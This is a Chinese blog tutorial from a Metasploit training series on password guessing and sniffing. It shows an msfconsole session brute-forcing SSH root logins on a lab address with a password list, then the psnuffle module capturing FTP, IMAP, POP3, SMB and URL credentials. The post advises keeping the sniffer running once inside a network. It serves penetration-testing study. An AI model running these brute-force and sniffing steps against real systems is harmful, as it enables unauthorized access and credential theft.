zoukankan      html  css  js  c++  java
  • MSF魔鬼训练营-3.3.2 口令猜测与嗅探

    密码暴力破解以SSH为例,其他协议方法类似
    SSH
         msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 192.168.3.199
    rhosts => 192.168.3.199
    msf auxiliary(ssh_login) > set username root
    username => root
    msf auxiliary(ssh_login) > set pass_file /root/pass.txt
    pass_file => /root/pass.txt
    msf auxiliary(ssh_login) > set threads 100
    threads => 100
    msf auxiliary(ssh_login) > run
     
    [*] SSH - Starting bruteforce
    [-] SSH - Failed: 'root:19500101an'
    [-] SSH - Failed: 'root:19500101ba'
    [-] SSH - Failed: 'root:19500101bai'
    [-] SSH - Failed: 'root:19500101ban'
    [-] SSH - Failed: 'root:19500101bao'
    [-] SSH - Failed: 'root:19500101bei'
    [-] SSH - Failed: 'root:19500101bi'
    [-] SSH - Failed: 'root:19500101bian'
     

    在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(psnuffle) > show options
     
    Module options (auxiliary/sniffer/psnuffle):
     
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
     
     
    Auxiliary action:
     
       Name     Description
       ----     -----------
       Sniffer 
     
     
    msf auxiliary(psnuffle) > run
    [*] Auxiliary module execution completed
    msf auxiliary(psnuffle) >
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
     
     
  • 相关阅读:
    Linux 实例如何开启 MySQL 慢查询功能
    20步打造最安全的Nginx Web服务器
    解决java compiler level does not match the version of the installed java project facet
    maven项目重构目录
    【JeeSite】角色和权限的修改
    【JeeSite】区域和菜单管理
    【JeeSite】登录和主题切换
    【JeeSite】用户管理
    一个程序员的故事
    maven项目发布到Tomcat丢失jar包
  • 原文地址:https://www.cnblogs.com/enderzhou/p/7554283.html
Copyright © 2011-2022 走看看